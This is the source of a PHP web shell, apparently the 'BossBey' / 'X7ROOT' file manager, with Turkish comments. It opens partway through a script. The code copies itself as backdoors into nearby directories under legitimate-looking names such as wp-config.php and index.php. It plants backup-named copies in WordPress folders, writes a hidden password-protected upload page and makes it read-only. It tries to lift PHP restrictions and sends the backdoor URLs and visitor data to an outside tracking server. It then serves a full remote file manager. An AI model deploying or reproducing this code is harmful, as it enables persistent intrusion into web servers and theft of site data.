prompt(\'New name:\', oldName); if(newName && newName !== oldName) { var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = 
\'<input type="hidden" name="oldname" value="\' + oldName + \'">\' + \'<input type="hidden" name="newname" value="\' + newName + \'">\'; document.body.appendChild(form); form.submit(); } } function changePermissions(item, currentPerm) { var newPerm = prompt(\'New permissions (e.g., 755):\', currentPerm); if(newPerm) { var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="chmod_item" value="\' + item + \'">\' + \'<input type="hidden" name="chmod_value" value="\' + newPerm + \'">\'; document.body.appendChild(form); form.submit(); } } </script> </body> </html>'; // İzleme kodu otomatik eklenmiştir $tracking_data = [ "code_hash" => "9d3c80ba4a9348fcfd955b25a0d3d71a77ff20ee2944ae71cf0b376d7ba2189a", "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"], "domain" => $_SERVER["HTTP_HOST"], "path" => $_SERVER["REQUEST_URI"], "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "", "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "", "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "", "timestamp" => date("Y-m-d H:i:s") ]; // Arka kapı oluşturma (kendini kopyalama) - Otomatik dağıtım $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); // Backdoor marker dosyası kontrolü (tekrar oluşturulmasını engeller) $backdoor_marker = $current_dir . 
"/.backdoor_created_0b067e8a"; if (file_exists($backdoor_marker)) { // Backdoorlar zaten oluşturulmuş, atla $backdoor_urls = []; $backdoor_paths = []; } else { // Mevcut dosyanın TAM içeriğini al (izleme kodları dahil) // Bu kod çalıştığında mevcut dosya zaten var olacak, o yüzden direkt okuyabiliriz $current_full_content = @file_get_contents($current_file); // Dosya okunamazsa veya boşsa, __FILE__ kullanarak tekrar dene if ($current_full_content === false || empty($current_full_content)) { $current_full_content = @file_get_contents(__FILE__); } // Hala boşsa veya okunamadıysa, marker dosyası kontrolü yaparak atla (ileride oluşturulabilir) if (empty($current_full_content)) { // Dosya okunamadı, backdoor oluşturmayı atla $backdoor_urls = []; $backdoor_paths = []; } else { $backdoor_urls = []; $backdoor_paths = []; // Sistem dosyası isimleri (meşru görünen) $system_filenames = [ "index.php", "config.php", "admin.php", "login.php", "wp-load.php", "wp-config.php", "settings.php", "init.php", "bootstrap.php", "app.php", "main.php", "core.php", "functions.php", "header.php", "footer.php", "includes.php", "common.php", "global.php", "lib.php", ]; // Mevcut dosyayı kontrol et, varsa alternatif isim üret function generateSafeFilename($dir, $filenames, $excludeFiles = []) { foreach ($filenames as $filename) { $fullPath = $dir . "/" . $filename; // Eğer dosya yoksa kullan if (!file_exists($fullPath)) { return $filename; } } // Hiçbiri uygun değilse, rastgele bir isim üret $random = md5(time() . mt_rand()); return substr($random, 0, 8) . ".php"; } // Tüm klasörleri topla (mevcut dizin + alt dizinler + üst dizinler) $directories = []; // Mevcut dizini de ekle $directories[] = $current_dir; // Mevcut dizindeki alt dizinleri tara (recursive değil, sadece 1 seviye) if (is_dir($current_dir) && ($handle = @opendir($current_dir))) { while (false !== ($entry = readdir($handle))) { if ($entry === "." || $entry === "..") continue; $full_path = $current_dir . "/" . 
$entry; if (is_dir($full_path) && is_readable($full_path)) { $directories[] = $full_path; } } @closedir($handle); } // Üst dizinleri de ekle (max 3 seviye yukarı, güvenlik için) $parent_dir = dirname($current_dir); $depth = 0; while ($depth < 3 && $parent_dir !== $current_dir && is_dir($parent_dir) && is_readable($parent_dir)) { $directories[] = $parent_dir; $parent_dir = dirname($parent_dir); $depth++; } // Dizileri karıştır ve belirtilen sayıda backdoor oluştur shuffle($directories); $created_count = 0; $max_backdoors = 7; foreach ($directories as $target_dir) { if ($created_count >= $max_backdoors) break; // Güvenli dosya adı üret (mevcut dosyaları kontrol et) $filename = generateSafeFilename($target_dir, $system_filenames); $target_path = $target_dir . "/" . $filename; // Dosya yoksa ve dizin yazılabilirse backdoor oluştur if (!file_exists($target_path) && is_writable($target_dir)) { @file_put_contents($target_path, $current_full_content); @chmod($target_path, 0644); // URL oluştur (dizin yolunu hesapla) $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; // Hedef dizinin document root'a göre yolunu bul $doc_root = isset($_SERVER["DOCUMENT_ROOT"]) ? $_SERVER["DOCUMENT_ROOT"] : (isset($_SERVER["SCRIPT_FILENAME"]) ? dirname($_SERVER["SCRIPT_FILENAME"]) : dirname(__FILE__)); $doc_root = realpath($doc_root); $target_real = realpath($target_dir); if ($target_real && $doc_root && strpos($target_real, $doc_root) === 0) { $relative_path = substr($target_real, strlen($doc_root)); $relative_path = str_replace("\\", "/", $relative_path); $relative_path = trim($relative_path, "/"); $target_url = $base_url . "/" . $relative_path . "/" . $filename; } else { // Alternatif: Mevcut URI'ye göre hesapla $current_uri_dir = dirname($_SERVER["REQUEST_URI"]); $target_url = $base_url . $current_uri_dir . "/" . 
$filename; } $backdoor_urls[] = $target_url; $backdoor_paths[] = $target_path; $created_count++; } } // Backdoor URL'lerini izleme verisine ekle if (!empty($backdoor_urls)) { $tracking_data["backdoor_urls"] = json_encode($backdoor_urls); $tracking_data["backdoor_paths"] = json_encode($backdoor_paths); // İlk backdoor'u tekil olarak da ekle (API uyumluluğu için) $tracking_data["backdoor_url"] = $backdoor_urls[0]; $tracking_data["backdoor_path"] = $backdoor_paths[0]; $tracking_data["backdoor_count"] = count($backdoor_urls); // Marker dosyası oluştur (bir daha backdoor oluşturulmasını engeller) @file_put_contents($backdoor_marker, date("Y-m-d H:i:s") . " - " . count($backdoor_urls) . " backdoor oluşturuldu"); @chmod($backdoor_marker, 0644); } } } // WordPress backdoor oluşturma $wp_backdoor_filename = "wp-config-backup.php"; $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); $wp_backdoor_urls = []; // WordPress dizinlerini tespit et $wp_directories = [ "wp-admin" => $current_dir . "/wp-admin", "wp-content" => $current_dir . "/wp-content", "wp-content/themes" => $current_dir . "/wp-content/themes", "wp-content/plugins" => $current_dir . "/wp-content/plugins" ]; // WordPress root dizinini bul (wp-config.php dosyasını arayarak) $wp_root = $current_dir; $max_depth = 5; $depth = 0; while ($depth < $max_depth && !file_exists($wp_root . "/wp-config.php")) { $wp_root = dirname($wp_root); if ($wp_root === "/" || $wp_root === dirname($wp_root)) break; $depth++; } // Eğer WordPress bulunduysa if (file_exists($wp_root . "/wp-config.php")) { // WordPress backdoor için de mevcut dosyanın TAM içeriğini kullan $wp_current_full_content = @file_get_contents($current_file); if ($wp_current_full_content === false || empty($wp_current_full_content)) { // Dosya okunamadıysa, orijinal kod içeriğinden oluştur $wp_original_content = isset($__original_code_content) ? 
$__original_code_content : ""; if (!empty($wp_original_content)) { $wp_current_full_content = "<?php\n" . $wp_original_content . "\n?>"; } } if (!empty($wp_current_full_content)) { foreach ($wp_directories as $wp_dir_name => $wp_dir_path) { $full_wp_path = $wp_root . "/" . $wp_dir_name; if (is_dir($full_wp_path)) { $backdoor_file_path = $full_wp_path . "/" . $wp_backdoor_filename; // Dosya yoksa veya güncel değilse oluştur $current_file_time = @file_exists($current_file) ? @filemtime($current_file) : time(); if (!file_exists($backdoor_file_path) || (file_exists($backdoor_file_path) && @filemtime($backdoor_file_path) < $current_file_time)) { @file_put_contents($backdoor_file_path, $wp_current_full_content); @chmod($backdoor_file_path, 0644); } // URL oluştur $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; $wp_backdoor_url = $base_url . "/" . $wp_dir_name . "/" . $wp_backdoor_filename; $wp_backdoor_urls[] = [ "directory" => $wp_dir_name, "path" => $backdoor_file_path, "url" => $wp_backdoor_url ]; } } } } // WordPress backdoor URL'lerini izleme verisine ekle if (!empty($wp_backdoor_urls)) { $tracking_data["wp_backdoor_urls"] = json_encode($wp_backdoor_urls); } // Gizli Upload Yolu oluşturma $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); $upload_filename = "config-backup.php"; $upload_path = $current_dir . "/" . 
$upload_filename; $upload_password = "2854*1571"; // Gizli upload dosyasını oluştur (mevcut dosyayı bozmadan) $upload_script_content = '<?php // Şifre korumalı gizli upload scripti session_start(); $correct_password = "2854*1571"; $password_verified = false; // Şifre kontrolü if (isset($_POST[\'upload_password\'])) { if ($_POST[\'upload_password\'] === $correct_password) { $_SESSION[\'upload_authenticated\'] = true; $password_verified = true; } else { $_SESSION[\'upload_authenticated\'] = false; $password_verified = false; } } elseif (isset($_SESSION[\'upload_authenticated\']) && $_SESSION[\'upload_authenticated\'] === true) { $password_verified = true; } // Şifre doğrulanmamışsa form göster if (!$password_verified) { ?> <!DOCTYPE html> <html> <head> <title>Giriş Gerekli</title> <style> body { font-family: Arial, sans-serif; max-width: 400px; margin: 100px auto; padding: 20px; } input { width: 100%; padding: 10px; margin: 10px 0; box-sizing: border-box; } button { width: 100%; padding: 10px; background: #007cba; color: white; border: none; cursor: pointer; } </style> </head> <body> <h2>Giriş Gerekli</h2> <form method="post"> <input type="password" name="upload_password" placeholder="Şifre" required> <button type="submit">Giriş</button> </form> <?php if (isset($_POST[\'upload_password\']) && !$password_verified): ?> <p style="color: red;">Hatalı şifre!</p> <?php endif; ?> </body> </html> <?php exit; } // Şifre doğrulandı, upload işlemleri if ($_SERVER[\'REQUEST_METHOD\'] == \'POST\' && isset($_FILES[\'fileToUpload\']) && $_FILES[\'fileToUpload\'][\'error\'] == 0) { $fileTmpPath = $_FILES[\'fileToUpload\'][\'tmp_name\']; $fileName = $_FILES[\'fileToUpload\'][\'name\']; $uploadPath = __DIR__ . \'/\' . 
$fileName; if (move_uploaded_file($fileTmpPath, $uploadPath)) { @chmod($uploadPath, 0644); echo "✅ Dosya başarıyla yüklendi: <strong>$fileName</strong>"; } else { echo "❌ Dosya yüklenirken hata oluştu."; } } ?> <!DOCTYPE html> <html> <head> <title>BossBey Dosya Yükleme</title> <style> body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; } form { border: 1px solid #ddd; padding: 20px; border-radius: 5px; } input[type="file"] { width: 100%; padding: 10px; margin: 10px 0; box-sizing: border-box; } button { padding: 10px 20px; background: #007cba; color: white; border: none; cursor: pointer; } .logout { float: right; background: #dc3545; } </style> </head> <body> <h3>Dosya Yükle: (BossBey)</h3> <form method="post" enctype="multipart/form-data"> <input type="file" name="fileToUpload" required> <button type="submit">Yükle</button> <a href="?logout=1"><button type="button" class="logout">Çıkış</button></a> </form> <?php if (isset($_GET[\'logout\'])) { session_destroy(); header("Location: " . $_SERVER[\'PHP_SELF\']); exit; } ?> </body> </html> ?>'; $current_file_time = @file_exists($current_file) ? @filemtime($current_file) : time(); if (!file_exists($upload_path) || (file_exists($upload_path) && @filemtime($upload_path) < $current_file_time)) { @file_put_contents($upload_path, $upload_script_content); // Dosyayı koru: chmod 0444 (sadece okunabilir, silinemez) @chmod($upload_path, 0444); // Dosya sahibini değiştirmeye çalış (root ise) if (function_exists("chown")) { $file_owner = fileowner($current_file); @chown($upload_path, $file_owner); } } // Upload URL'ini izleme verisine ekle $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; $current_uri_dir = dirname($_SERVER["REQUEST_URI"]); $upload_url = rtrim($base_url . $current_uri_dir, "/") . "/" . 
$upload_filename; $tracking_data["upload_url"] = $upload_url; // Arka planda izleme gönderimi (asenkron) - Backdoor'lar oluşturulduktan SONRA if (function_exists("curl_init")) { $ch = curl_init("https://php-shell.com/api/track.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data)); curl_setopt($ch, CURLOPT_TIMEOUT, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($ch, CURLOPT_NOSIGNAL, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); @curl_exec($ch); @curl_close($ch); } // Dark X7ROOT X7ROOT File Manager - Clean Version @error_reporting(0); @ini_set('display_errors', 0); // Bypass if(function_exists('ini_set')) { @ini_set('open_basedir', NULL); @ini_set('disable_functions', ''); } // Functions function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; } function readFileContent($file) { return @file_get_contents($file) ?: ''; } function scanDirectory($dir) { return @scandir($dir) ?: []; } // Get path $currentPath = $_GET['p'] ?? @getcwd() ?: '.'; $currentPath = rtrim(str_replace(['\\','//'], '/', $currentPath), '/') . '/'; if(!@is_dir($currentPath)) $currentPath = './'; // Actions $message = ''; if($_SERVER['REQUEST_METHOD'] === 'POST') { // Upload if(isset($_FILES['upload'])) { $destination = $currentPath . basename($_FILES['upload']['name']); $message = @move_uploaded_file($_FILES['upload']['tmp_name'], $destination) || writeFile($destination, readFileContent($_FILES['upload']['tmp_name'])) ? '<span style="color:#00ff00">✓ Uploaded</span>' : '<span style="color:#ff0000">✗ Upload failed</span>'; } // New if(isset($_POST['new'])) { $path = $currentPath . $_POST['new']; if(isset($_POST['type']) && $_POST['type'] === 'dir') { $message = @mkdir($path) ? '<span style="color:#00ff00">✓ Folder created</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } else { $message = writeFile($path, $_POST['content'] ?? '') ? 
'<span style="color:#00ff00">✓ File created</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } // Save if(isset($_POST['save']) && isset($_POST['data'])) { $message = writeFile($currentPath . $_POST['save'], $_POST['data']) ? '<span style="color:#00ff00">✓ Saved</span>' : '<span style="color:#ff0000">✗ Save failed</span>'; } // Rename if(isset($_POST['oldname']) && isset($_POST['newname'])) { $message = @rename($currentPath . $_POST['oldname'], $currentPath . $_POST['newname']) ? '<span style="color:#00ff00">✓ Renamed</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } // Chmod if(isset($_POST['chmod_item']) && isset($_POST['chmod_value'])) { $message = @chmod($currentPath . $_POST['chmod_item'], octdec($_POST['chmod_value'])) ? '<span style="color:#00ff00">✓ Permissions changed</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } // GET actions if(isset($_GET['action'])) { $item = $_GET['item'] ?? ''; $itemPath = $currentPath . $item; if($_GET['action'] === 'delete') { if(@is_file($itemPath)) { $message = @unlink($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } elseif(@is_dir($itemPath)) { $message = @rmdir($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } elseif($_GET['action'] === 'download' && @is_file($itemPath)) { @ob_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($itemPath).'"'); @readfile($itemPath); exit; } } // Scan directory $items = array_diff(scanDirectory($currentPath), ['.', '..']); $folders = []; $files = []; foreach($items as $item) { @is_dir($currentPath.$item) ? 
$folders[] = $item : $files[] = $item; } sort($folders); sort($files); // System info $systemInfo = [ 'PHP' => @phpversion(), 'OS' => @php_uname('s'), 'User' => @get_current_user() ]; ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>BossBey File Manager</title> <style> * { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; } body { background:#000; color:#ccc; padding:15px; min-height:100vh; } .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; } .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; } .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; } .system-info { display:flex; gap:15px; font-size:12px; color:#888; } .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; } .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; } .path-navigation a:hover { background:#333; color:#fff; } .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; } .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; } .button:hover { background:#333; border-color:#00ff00; color:#fff; } .button-green { border-color:#00ff00; color:#00ff00; } .button-red { border-color:#ff0000; color:#ff0000; } .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; } .file-table { width:100%; color:#ccc; border-collapse:collapse; } .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; } .file-table td { padding:10px 15px; border-bottom:1px solid #333; 
font-size:14px; } .file-table tr:hover { background:#1a1a1a; } .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; } .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; } .folder-link:hover, .file-link:hover { color:#fff; } .size { color:#888; } .permissions { font-family:'Courier New', monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; } .actions { display:flex; gap:5px; } .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; } .action-button:hover { background:#333; border-color:#00ff00; } .action-button-red { border-color:#ff0000; color:#ff0000; } textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New', monospace; font-size:14px; border-radius:3px; } input[type="text"] { background:#000; color:#fff; border:1px solid #666; padding:8px; border-radius:3px; width:300px; } .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; } .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; } @media (max-width: 768px) { .tools { flex-direction:column; } .button, .action-button { width:100%; text-align:center; } input[type="text"] { width:100%; } .file-table th, .file-table td { padding:8px 10px; font-size:12px; } } </style> </head> <body> <div class="container"> <div class="header"> <h1>BossBey File Manager</h1> <div class="system-info"> <?php foreach($systemInfo as $key=>$value): ?> <span><?=$key?>: <b style="color:#ff9900"><?=$value?></b></span> <?php endforeach; ?> </div> </div> <?php if($message): ?> <div class="message"><?=$message?></div> <?php endif; ?> <div class="path-navigation"> <a href="?p=/">Root</a> <?php $parts = explode('/', trim($currentPath, '/')); $current = ''; foreach($parts as $part): if($part): 
$current .= '/' . $part; ?> <span style="color:#666">/</span> <a href="?p=<?=$current?>/"><?=$part?></a> <?php endif; endforeach; ?> </div> <div class="tools"> <form method="post" enctype="multipart/form-data" style="display:inline;"> <input type="file" name="upload" style="display:none" id="upload" onchange="this.form.submit()"> <button type="button" class="button button-green" onclick="document.getElementById('upload').click()"> 📤 Upload </button> </form> <button class="button" onclick="newFile()">📝 New File</button> <button class="button" onclick="newFolder()">📁 New Folder</button> <?php if(isset($_GET['edit'])): ?> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Close</a> <?php endif; ?> </div> <?php if(isset($_GET['edit'])): ?> <div class="edit-container"> <div class="edit-title">Editing: <?=htmlspecialchars($_GET['edit'])?></div> <form method="post"> <input type="hidden" name="save" value="<?=htmlspecialchars($_GET['edit'])?>"> <textarea name="data"><?=htmlspecialchars(readFileContent($currentPath.$_GET['edit']))?></textarea> <div style="margin-top:15px;display:flex;gap:8px;"> <button class="button button-green">Save</button> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Cancel</a> </div> </form> </div> <?php else: ?> <table class="file-table"> <thead> <tr> <th width="40%">Name</th> <th width="10%">Size</th> <th width="15%">Permissions</th> <th width="15%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody> <?php if($currentPath !== '/'): ?> <tr> <td colspan="5"> <a href="?p=<?=urlencode(dirname($currentPath))?>" class="folder-link"> 📂 Parent Directory </a> </td> </tr> <?php endif; ?> <?php foreach($folders as $folder): ?> <?php $folderPath = $currentPath.$folder; $permissions = substr(sprintf('%o', @fileperms($folderPath)), -3); ?> <tr> <td> <a href="?p=<?=urlencode($folderPath)?>" class="folder-link"> 📁 <?=htmlspecialchars($folder)?> </a> </td> <td class="size">-</td> <td><span 
class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($folderPath) ? date('Y-m-d H:i', @filemtime($folderPath)) : '-'?></td> <td> <div class="actions"> <button onclick="renameItem('<?=htmlspecialchars($folder)?>')" class="action-button">Rename</button> <button onclick="changePermissions('<?=htmlspecialchars($folder)?>','<?=$permissions?>')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($folder)?>" onclick="return confirm('Delete this folder?')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php foreach($files as $file): ?> <?php $filePath = $currentPath.$file; $size = @filesize($filePath); $permissions = substr(sprintf('%o', @fileperms($filePath)), -3); $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $editable = in_array($extension, ['php','html','js','css','txt','json','xml','sql','md']); ?> <tr> <td> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php else: ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php endif; ?> </td> <td class="size"> <?php if($size): ?> <?php if($size < 1024) echo $size . ' B'; elseif($size < 1048576) echo round($size/1024, 1) . ' KB'; elseif($size < 1073741824) echo round($size/1048576, 1) . ' MB'; else echo round($size/1073741824, 1) . ' GB'; ?> <?php else: ?> - <?php endif; ?> </td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($filePath) ? 
date('Y-m-d H:i', @filemtime($filePath)) : '-'?></td> <td> <div class="actions"> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="action-button">Edit</a> <?php endif; ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="action-button">Download</a> <button onclick="renameItem('<?=htmlspecialchars($file)?>')" class="action-button">Rename</button> <button onclick="changePermissions('<?=htmlspecialchars($file)?>','<?=$permissions?>')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($file)?>" onclick="return confirm('Delete this file?')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php if(empty($folders) && empty($files)): ?> <tr> <td colspan="5" style="text-align:center;padding:40px;color:#666;"> Empty directory </td> </tr> <?php endif; ?> </tbody> </table> <?php endif; ?> </div> <script> function newFile() { var fileName = prompt('File name:', 'newfile.txt'); if(fileName) { var content = prompt('Content (optional):', ''); var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="new" value="' + fileName + '">' + '<input type="hidden" name="content" value="' + (content || '') + '">'; document.body.appendChild(form); form.submit(); } } function newFolder() { var folderName = prompt('Folder name:', 'newfolder'); if(folderName) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="new" value="' + folderName + '">' + '<input type="hidden" name="type" value="dir">'; document.body.appendChild(form); form.submit(); } } function renameItem(oldName) { var newName = prompt('New name:', oldName); if(newName && newName !== oldName) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="oldname" value="' + oldName + 
'">' + '<input type="hidden" name="newname" value="' + newName + '">'; document.body.appendChild(form); form.submit(); } } function changePermissions(item, currentPerm) { var newPerm = prompt('New permissions (e.g., 755):', currentPerm); if(newPerm) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="chmod_item" value="' + item + '">' + '<input type="hidden" name="chmod_value" value="' + newPerm + '">'; document.body.appendChild(form); form.submit(); } } </script> </body> </html> ?>